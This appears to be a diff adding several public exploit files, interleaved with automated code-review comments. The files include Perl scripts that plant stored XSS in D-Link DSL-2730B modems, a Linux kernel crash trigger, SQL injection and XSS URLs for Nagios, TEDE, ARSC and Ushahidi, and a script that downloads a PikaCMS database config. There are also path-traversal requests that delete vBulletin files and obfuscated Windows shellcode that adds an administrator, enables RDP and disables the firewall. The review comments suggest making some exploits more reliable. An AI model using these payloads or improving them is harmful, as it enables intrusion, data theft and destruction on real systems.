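Review bot: `$ip = $1 if($ip=~/(.*)\/$/);` runs before the `@ARGV != 4` usage check, so running the script with no arguments matches against an undefined `$ip` and prints a "Use of uninitialized value" warning (expanded further by `use diagnostics`) ahead of the usage text; move that line into the `else` branch once the argument count has been validated, and apply the same treatment to the `$opt == 1` numeric comparisons, which warn when `$opt` is not a number. The constructors use indirect-object syntax (`new LWP::UserAgent`, `new HTTP::Headers(...)`, `new HTTP::Request(...)`), which Perl parses unreliably; write them as `LWP::UserAgent->new`, `HTTP::Headers->new(...)` and `HTTP::Request->new(...)`. `HTTP::Headers` is also used without its own `use HTTP::Headers;`, relying on LWP::UserAgent loading it transitively, and `$resposta` is assigned from `$resp->as_string` but never read.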
138
platforms/hardware/webapps/35750.pl
|
@ -0,0 +1,138 @@
|
|||
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
|
||||
# Date: 11-01-2015
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.dlink.com
|
||||
# Hardware version: C1
|
||||
# Version: GE 1.01
|
||||
# Tested on: Windows 8 and Linux
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Date dd-mm-aaaa: 11-11-2014
|
||||
# Exploit for D-Link DSL-2730B
|
||||
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
|
||||
# Developed by Mauricio Corrêa
|
||||
# XLabs Information Security
|
||||
# WebSite: www.xlabs.com.br
|
||||
# More informations: www.xlabs.com.br/blog/?p=339
|
||||
#
|
||||
# CAUTION!
|
||||
# This exploit enable some features of the modem,
|
||||
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
|
||||
# occurring script execution in the browser of internal network users.
|
||||
#
|
||||
# Use with caution!
|
||||
# Use at your own risk!
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use diagnostics;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use URI::Escape;
|
||||
|
||||
|
||||
my $ip = $ARGV[0];
|
||||
my $user = $ARGV[1];
|
||||
my $pass = $ARGV[2];
|
||||
|
||||
$ip = $1 if($ip=~/(.*)\/$/);
|
||||
|
||||
if (@ARGV != 3){
|
||||
print "\n";
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
|
||||
|
||||
}else{
|
||||
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "[+] Exploring $ip\/ ...\n";
|
||||
|
||||
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
|
||||
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
|
||||
|
||||
|
||||
$hdrs->authorization_basic($user, $pass);
|
||||
|
||||
chomp($ip);
|
||||
|
||||
|
||||
print "[+] Preparing...\n";
|
||||
|
||||
|
||||
my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
|
||||
|
||||
|
||||
my $req = new HTTP::Request("GET",$url,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Requesting...\n";
|
||||
|
||||
my $resp = $ua->request($req);
|
||||
|
||||
if ($resp->is_success){
|
||||
|
||||
print "[+] Successfully Requested!\n";
|
||||
|
||||
my $resposta = $resp->as_string;
|
||||
|
||||
print "[+] Obtain session key...\n";
|
||||
|
||||
my $token = "";
|
||||
|
||||
if($resposta =~ /sessionKey=(.*)\';/){
|
||||
$token = $1;
|
||||
print "[+] Session key found: $token\n";
|
||||
}else{
|
||||
print "[-] Session key not found!\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
print "[+] Preparing exploit...\n";
|
||||
|
||||
my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
|
||||
|
||||
$req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Exploiting...\n";
|
||||
|
||||
my $resp2 = $ua->request($req);
|
||||
|
||||
|
||||
if ($resp2->is_success){
|
||||
|
||||
my $resultado = $resp2->as_string;
|
||||
|
||||
if(index($resultado, uri_unescape($payload)) != -1){
|
||||
|
||||
print "[+] Successfully Exploited!";
|
||||
|
||||
}else{
|
||||
|
||||
print "[-] Not Exploited!";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}else {
|
||||
|
||||
print "[-] Ops!\n";
|
||||
print $resp->message;
|
||||
}
|
||||
}
|
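Review bot: The final success check compares the payload against `$resultado`, which is the body of `$resp2` — the response to the injecting request `$url_and_xpl` itself — so a `[+] Successfully Exploited!` only proves the value was echoed back, not that it persisted, although the title claims a stored XSS; the sibling lancfg2get.cgi script re-fetches the rendering page before checking, and this one should do the same with whichever page displays `domainname` (the exact page is not visible here, confirm against the device). The session-key capture `/sessionKey=(.*)\';/` is greedy and would swallow everything up to the last `';` on the line if the page ever has more than one such token; `([^']*)` is the safer form. `$ip = $1 if($ip=~/(.*)\/$/)` also runs before the `@ARGV != 3` check, so invoking the script with no arguments first warns about an undefined `$ip` under `use warnings` before the usage text is printed.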
115
platforms/hardware/webapps/35751.pl
Executable file
115
platforms/hardware/webapps/35751.pl
Executable file
|
@ -0,0 +1,115 @@
|
|||
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
|
||||
# Date: 11-01-2015
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.dlink.com
|
||||
# Hardware version: C1
|
||||
# Version: GE 1.01
|
||||
# Tested on: Windows 8 and Linux
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Date dd-mm-aaaa: 11-11-2014
|
||||
# Exploit for D-Link DSL-2730B
|
||||
# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
|
||||
# Developed by Mauricio Corrêa
|
||||
# XLabs Information Security
|
||||
# WebSite: www.xlabs.com.br
|
||||
# More informations: www.xlabs.com.br/blog/?p=339
|
||||
#
|
||||
# CAUTION!
|
||||
# This exploit disables some features of the modem,
|
||||
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
|
||||
# occurring script execution in the browser of internal network users.
|
||||
#
|
||||
# Use with caution!
|
||||
# Use at your own risk!
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use diagnostics;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use URI::Escape;
|
||||
|
||||
my $ip = $ARGV[0];
|
||||
my $user = $ARGV[1];
|
||||
my $pass = $ARGV[2];
|
||||
|
||||
$ip = $1 if($ip=~/(.*)\/$/);
|
||||
|
||||
if (@ARGV != 3){
|
||||
|
||||
print "\n";
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
|
||||
}else{
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "[+] Exploring $ip\/ ...\n";
|
||||
|
||||
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
|
||||
|
||||
$hdrs->authorization_basic($user, $pass);
|
||||
|
||||
chomp($ip);
|
||||
|
||||
print "[+] Preparing exploit...\n";
|
||||
|
||||
my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";
|
||||
|
||||
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Requesting and Exploiting...\n";
|
||||
|
||||
my $resp = $ua->request($req);
|
||||
|
||||
if ($resp->is_success){
|
||||
|
||||
print "[+] Successfully Requested!\n";
|
||||
|
||||
|
||||
my $url = "$ip/lancfg2.html";
|
||||
|
||||
$req = new HTTP::Request("GET",$url,$hdrs);
|
||||
|
||||
print "[+] Checking that was explored...\n";
|
||||
|
||||
|
||||
my $resp2 = $ua->request($req);
|
||||
|
||||
|
||||
if ($resp2->is_success){
|
||||
|
||||
my $resultado = $resp2->as_string;
|
||||
|
||||
if(index($resultado, uri_unescape($payload)) != -1){
|
||||
|
||||
print "[+] Successfully Exploited!";
|
||||
|
||||
}else{
|
||||
|
||||
print "[-] Not Exploited!";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}else {
|
||||
|
||||
print "[-] Ops!\n";
|
||||
print $resp->message;
|
||||
}
|
||||
|
||||
}
|
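Review bot: The exploiting request `$ip/lancfg2get.cgi?brName=$payload` carries no `sessionKey`, whereas the sibling dnsProxy.cmd script has to scrape one and append it; if lancfg2get.cgi really applies a configuration change without that token, the header should say so explicitly, because that is a separate CSRF weakness (a single GET from any page the logged-in admin visits would suffice) and not only a stored XSS. The verification step `if ($resp2->is_success){ ... }` has no else branch, so a failed re-fetch of `lancfg2.html` prints nothing and the run ends silently; `else { print "[-] Verification request failed: ", $resp2->status_line, "\n"; }` would make that visible. As with the sibling script, `$ip` is regex-matched before the argument-count check, so a bare invocation warns on an undefined value before printing the usage text.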
26
platforms/linux/dos/35820.c
Executable file
26
platforms/linux/dos/35820.c
Executable file
|
@ -0,0 +1,26 @@
|
|||
source: http://www.securityfocus.com/bid/48101/info
|
||||
|
||||
The Linux kernel is prone to a local denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition.
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/mman.h>
|
||||
#define BUFSIZE getpagesize()
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
void *ptr;
|
||||
if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) {
|
||||
perror("posix_memalign");
|
||||
exit(1);
|
||||
}
|
||||
if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
|
||||
perror("madvise");
|
||||
exit(1);
|
||||
}
|
||||
*(char *)NULL = 0;
|
||||
return 0;
|
||||
}
|
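Review bot: `posix_memalign` returns the error number directly and does not set errno, so `if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0)` never fires and, if it did, `perror` would print an unrelated errno; use `int rc = posix_memalign(&ptr, getpagesize(), BUFSIZE);` followed by `if (rc != 0) { fprintf(stderr, "posix_memalign: %s\n", strerror(rc)); exit(1); }` (needs `#include <string.h>`). The madvise check is correct as written, but a comment that `MADV_MERGEABLE` requires a kernel built with KSM support (EINVAL otherwise) would save readers a confusing early exit. The trigger is the NULL store on the last line; on a fixed kernel that is an ordinary SIGSEGV in this process, so the header should tell the reader what distinguishes "vulnerable" (a kernel oops or panic) from "fixed" (only the test program dies).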
10
platforms/multiple/remote/35818.txt
Executable file
10
platforms/multiple/remote/35818.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/48087/info
|
||||
|
||||
Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Nagios 3.2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
|
||||
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
|
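Review bot: Both PoC URLs carry raw `<`, `>` and a space; browsers and HTTP libraries percent-encode these, so the second one (`<body onload=alert(666)>`) will not be transmitted as shown and a reader's copy-paste can fail for the wrong reason — give the encoded form, e.g. `expand=%3Cbody%20onload%3Dalert(666)%3E`, alongside it. The advisory should also state whether `config.cgi` is reachable without credentials; if, as is typical, the Nagios cgi-bin directory sits behind HTTP basic auth, the realistic victim is an already-authenticated operator, which changes the impact statement ("steal cookie-based authentication credentials") since basic-auth sessions carry no cookie to steal.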
120
platforms/php/webapps/35733.txt
Executable file
120
platforms/php/webapps/35733.txt
Executable file
|
@ -0,0 +1,120 @@
|
|||
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
|
||||
SQL Injection & XSS
|
||||
# Date: January 8, 2015
|
||||
# Exploit Author: Technidev (https://technidev.com)
|
||||
# Vendor Homepage: https://vbulletin.com
|
||||
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
|
||||
# Version: 1.1.4
|
||||
|
||||
This plugin is fairly old but still used by a lot of people and received
|
||||
its last update nearly 4 years ago.
|
||||
It’s vulnerable to arbitrary file deletion and SQL injection.
|
||||
|
||||
*Arbitrary File(s) Deletion*
|
||||
In /microcart/editor/assetmanager/ are a bunch of files which are
|
||||
probably used to manage files/folders for the administrator,
|
||||
unfortunately no authentication and checks were added to see if the user
|
||||
should have access to it and if the request doesn’t contain anything
|
||||
malicious.
|
||||
|
||||
The /microcart/editor/assetmanager/folderdel_.php file contains the
|
||||
following on top:
|
||||
|
||||
$sMsg = "";
|
||||
|
||||
if(isset($_POST["inpCurrFolder"]))
|
||||
{
|
||||
$sDestination = pathinfo($_POST["inpCurrFolder"]);
|
||||
|
||||
//DELETE ALL FILES IF FOLDER NOT EMPTY
|
||||
$dir = $_POST["inpCurrFolder"];
|
||||
$handle = opendir($dir);
|
||||
while($file = readdir($handle)) if($file != "." && $file != "..")
|
||||
unlink($dir . "/" . $file);
|
||||
closedir($handle);
|
||||
|
||||
if(rmdir($_POST["inpCurrFolder"])==0)
|
||||
$sMsg = "";
|
||||
else
|
||||
$sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
|
||||
}
|
||||
By simply sending a POST request to this file, we can delete every
|
||||
single file in specified folder.
|
||||
|
||||
POST to: /microcart/editor/assetmanager/folderdel_.php
|
||||
POST data: inpCurrFolder: ../../../
|
||||
This POST request will delete every single .php file in the root folder
|
||||
of vBulletin.
|
||||
|
||||
*Arbitrary File Deletion*
|
||||
There’s another vulnerability which resides in the
|
||||
/microcart/editor/assetmanager/assetmanager.php file. It contains an
|
||||
upload function, which is safe, and a file deletion function, which is
|
||||
not safe. We can delete any file off the server by abusing this. So
|
||||
unlike the previous vulnerability I just wrote which deletes all files
|
||||
by sending a POST request with a folder value, this will only delete 1
|
||||
file off the server.
|
||||
|
||||
Vulnerable code:
|
||||
if(isset($_POST["inpFileToDelete"]))
|
||||
{
|
||||
$filename=pathinfo($_POST["inpFileToDelete"]);
|
||||
$filename=$filename['basename'];
|
||||
if($filename!="")
|
||||
unlink($currFolder . "/" . $filename);
|
||||
$sMsg = "";
|
||||
}
|
||||
Exploited by sending the following request:
|
||||
|
||||
POST to: /microcart/editor/assetmanager/assetmanager.php
|
||||
POST data: inpCurrFolder: ../../../
|
||||
inpFileToDelete: index.php
|
||||
This will delete the /index.php file of vBulletin, in the root.
|
||||
|
||||
*Aribtrary Folder Creation*
|
||||
Besides the file deletion, there’s a file called
|
||||
/microcart/editor/assetmanager/foldernew.php which created a 0755
|
||||
chmodded folder on the server.
|
||||
The file contains the following on top:
|
||||
$sMsg = "";
|
||||
|
||||
if(isset($_POST["inpNewFolderName"]))
|
||||
{
|
||||
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
|
||||
|
||||
if(is_dir($sFolder)==1)
|
||||
{//folder already exist
|
||||
$sMsg = "<script>document.write(getTxt('Folder already
|
||||
exists.'))</script>";
|
||||
}
|
||||
else
|
||||
{
|
||||
//if(mkdir($sFolder))
|
||||
if(mkdir($sFolder,0755))
|
||||
$sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
|
||||
else
|
||||
$sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
|
||||
}
|
||||
}
|
||||
By sending the following POST request, we will create a folder with 0755
|
||||
chmodded permission.
|
||||
|
||||
POST to: /microcart/editor/assetmanager/foldernew.php
|
||||
POST data: inpNewFolderName: davewashere
|
||||
inpCurrFolder: ../../..
|
||||
This POST request will create the folder davewashere in the root of the
|
||||
vBulletin forum.
|
||||
|
||||
*SQL Injection*
|
||||
MicroCART is also vulnerable to SQL injection at several locations
|
||||
although most of them are rather hard to abuse. I will not explain how
|
||||
to exploit it, but the vulnerability can be found at /cart.php line 833
|
||||
to 881 and the function where you can add products to your shopping
|
||||
cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to
|
||||
the configuration variable which is later used in a query.
|
||||
|
||||
*Cross Site Scripting*
|
||||
When modifying your information at /cart.php?do=cpanel, you can inject
|
||||
anything you want into the fields.
|
||||
Viewing reviews of products may be vulnerable as well when you leave out
|
||||
the wysiwyg POST key.
|
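Review bot: The `assetmanager.php` snippet unlinks `$currFolder . "/" . $filename` but the quoted code never shows `$currFolder` being populated from `inpCurrFolder`, which the request relies on; quoting that assignment (or stating that it is taken unsanitised from `$_POST["inpCurrFolder"]`) would make the traversal chain verifiable from the advisory alone. The `folderdel_.php` walkthrough first says the request deletes every file in the folder and then says it deletes "every single .php file" in the vBulletin root — the loop unlinks every directory entry regardless of extension and then `rmdir`s the directory, so the second sentence understates the impact. Since the plugin has not been updated in years and no fix is referenced, the advisory should end with a mitigation, e.g. remove `/microcart/editor/assetmanager/` entirely or place it behind the vBulletin admin authentication, rather than leaving readers without one.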
11
platforms/php/webapps/35814.txt
Executable file
11
platforms/php/webapps/35814.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/48067/info
|
||||
|
||||
TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
|
||||
|
||||
http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4
|
51
platforms/php/webapps/35815.pl
Executable file
51
platforms/php/webapps/35815.pl
Executable file
|
@ -0,0 +1,51 @@
|
|||
source: http://www.securityfocus.com/bid/48068/info
|
||||
|
||||
PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
||||
|
||||
use LWP::Simple;
|
||||
use LWP::UserAgent;
|
||||
system('cls');
|
||||
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit');
|
||||
system('color 2');
|
||||
if(@ARGV < 2)
|
||||
{
|
||||
print "[-]Su Sekilde Kocum. \n\n";
|
||||
&help; exit();
|
||||
}
|
||||
sub help()
|
||||
{
|
||||
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
|
||||
print "[+] usage2 : perl $0 localhost / \n";
|
||||
}
|
||||
print "\n************************************************************************\n";
|
||||
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit *\n";
|
||||
print "\* Exploited By : KnocKout *\n";
|
||||
print "\* Contact : knockoutr[at]msn[dot]com *\n";
|
||||
print "\* -- *\n";
|
||||
print "\*********************************************************************\n\n\n";
|
||||
($TargetIP, $path, $File,) = @ARGV;
|
||||
$File="shkarko.php?f=lidhjet/baza_mysql.php";
|
||||
my $url = "http://" . $TargetIP . $path . $File;
|
||||
print "\n Az Bekle Sikertiyorum!!! \n\n";
|
||||
my $useragent = LWP::UserAgent->new();
|
||||
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
|
||||
if ($request->is_success)
|
||||
{
|
||||
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
|
||||
print "[+] OPERASYON TAMAM !\n";
|
||||
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
|
||||
print "[+] GRAYHATZ STAR \n";
|
||||
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
|
||||
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
|
||||
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
|
||||
\n";
|
||||
exit();
|
||||
}
|
||||
else
|
||||
{
|
||||
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
|
||||
exit();
|
||||
}
|
||||
|
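Review bot: `system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit');` nests single quotes inside a single-quoted string, so the script does not compile as posted; write it as `system(q{title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit});` (and note in the header that `cls`/`title`/`color` are Windows-only). Success is judged on `$request->is_success` alone, so any 200 response — a generic HTML error page, a login page — is reported as `Hedef Site Exploit Edildi` and saved to disk; check the downloaded body for a `<?php` tag or a `$` assignment before declaring success. `$File` is read from `@ARGV` on one line and unconditionally overwritten on the next, and the final message names `z_WALKING_TIMES_DATA.php` while `:content_file` wrote `baza_mysql.php`. The script also lacks `use strict; use warnings;`, which would have flagged the undeclared globals.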
17
platforms/php/webapps/35816.txt
Executable file
17
platforms/php/webapps/35816.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/48083/info
|
||||
|
||||
ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected.
|
||||
|
||||
SQL injection:
|
||||
|
||||
http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
|
||||
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202
|
||||
|
||||
Cross-site Scripting:
|
||||
|
||||
http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
9
platforms/php/webapps/35819.txt
Executable file
9
platforms/php/webapps/35819.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/48100/info
|
||||
|
||||
Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Ushahidi 2.0.1 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]
|
442
platforms/win32/shellcode/35793.txt
Executable file
442
platforms/win32/shellcode/35793.txt
Executable file
|
@ -0,0 +1,442 @@
|
|||
#Author: Ali Razmjoo
|
||||
??#Title: ?Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
|
||||
Obfuscated Shellcode Windows x86 [1218 Bytes].c
|
||||
|
||||
/*
|
||||
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
#length: 1218 bytes
|
||||
#Date: 13 January 2015
|
||||
#Author: Ali Razmjoo
|
||||
#tested On: Windows 7 x86 ultimate
|
||||
|
||||
WinExec => 0x7666e695
|
||||
ExitProcess => 0x76632acf
|
||||
====================================
|
||||
Execute :
|
||||
net user ALI ALI /add
|
||||
net localgroup Administrators ALI /add
|
||||
NET LOCALGROUP "Remote Desktop Users" ALI /add
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
|
||||
netsh firewall set opmode disable
|
||||
sc config termservice start= auto
|
||||
====================================
|
||||
|
||||
|
||||
|
||||
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
|
||||
|
||||
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
|
||||
|
||||
|
||||
C:\Users\Ali\Desktop>objdump -D shellcode.o
|
||||
|
||||
shellcode.o: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: 31 c0 xor %eax,%eax
|
||||
2: 50 push %eax
|
||||
3: b8 41 41 41 64 mov $0x64414141,%eax
|
||||
8: c1 e8 08 shr $0x8,%eax
|
||||
b: c1 e8 08 shr $0x8,%eax
|
||||
e: c1 e8 08 shr $0x8,%eax
|
||||
11: 50 push %eax
|
||||
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
|
||||
17: ba 4d 59 32 36 mov $0x3632594d,%edx
|
||||
1c: 31 d1 xor %edx,%ecx
|
||||
1e: 51 push %ecx
|
||||
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
|
||||
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
|
||||
29: 31 d1 xor %edx,%ecx
|
||||
2b: 51 push %ecx
|
||||
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
|
||||
31: ba 4c 34 34 31 mov $0x3134344c,%edx
|
||||
36: 31 d1 xor %edx,%ecx
|
||||
38: 51 push %ecx
|
||||
39: b9 46 47 57 46 mov $0x46574746,%ecx
|
||||
3e: ba 33 34 32 34 mov $0x34323433,%edx
|
||||
43: 31 d1 xor %edx,%ecx
|
||||
45: 51 push %ecx
|
||||
46: b9 56 50 47 64 mov $0x64475056,%ecx
|
||||
4b: ba 38 35 33 44 mov $0x44333538,%edx
|
||||
50: 31 d1 xor %edx,%ecx
|
||||
52: 51 push %ecx
|
||||
53: 89 e0 mov %esp,%eax
|
||||
55: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
5a: c1 eb 08 shr $0x8,%ebx
|
||||
5d: c1 eb 08 shr $0x8,%ebx
|
||||
60: c1 eb 08 shr $0x8,%ebx
|
||||
63: 53 push %ebx
|
||||
64: 50 push %eax
|
||||
65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
6a: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
6f: 31 d3 xor %edx,%ebx
|
||||
71: ff d3 call *%ebx
|
||||
73: 31 c0 xor %eax,%eax
|
||||
75: 50 push %eax
|
||||
76: 68 41 41 64 64 push $0x64644141
|
||||
7b: 58 pop %eax
|
||||
7c: c1 e8 08 shr $0x8,%eax
|
||||
7f: c1 e8 08 shr $0x8,%eax
|
||||
82: 50 push %eax
|
||||
83: b9 01 41 60 32 mov $0x32604101,%ecx
|
||||
88: ba 48 61 4f 53 mov $0x534f6148,%edx
|
||||
8d: 31 d1 xor %edx,%ecx
|
||||
8f: 51 push %ecx
|
||||
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
|
||||
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
|
||||
9a: 31 d1 xor %edx,%ecx
|
||||
9c: 51 push %ecx
|
||||
9d: b9 03 24 36 21 mov $0x21362403,%ecx
|
||||
a2: ba 62 50 59 53 mov $0x53595062,%edx
|
||||
a7: 31 d1 xor %edx,%ecx
|
||||
a9: 51 push %ecx
|
||||
aa: b9 34 41 15 18 mov $0x18154134,%ecx
|
||||
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
|
||||
b4: 31 d1 xor %edx,%ecx
|
||||
b6: 51 push %ecx
|
||||
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
|
||||
bc: ba 68 68 72 4b mov $0x4b726868,%edx
|
||||
c1: 31 d1 xor %edx,%ecx
|
||||
c3: 51 push %ecx
|
||||
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
|
||||
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
|
||||
ce: 31 d1 xor %edx,%ecx
|
||||
d0: 51 push %ecx
|
||||
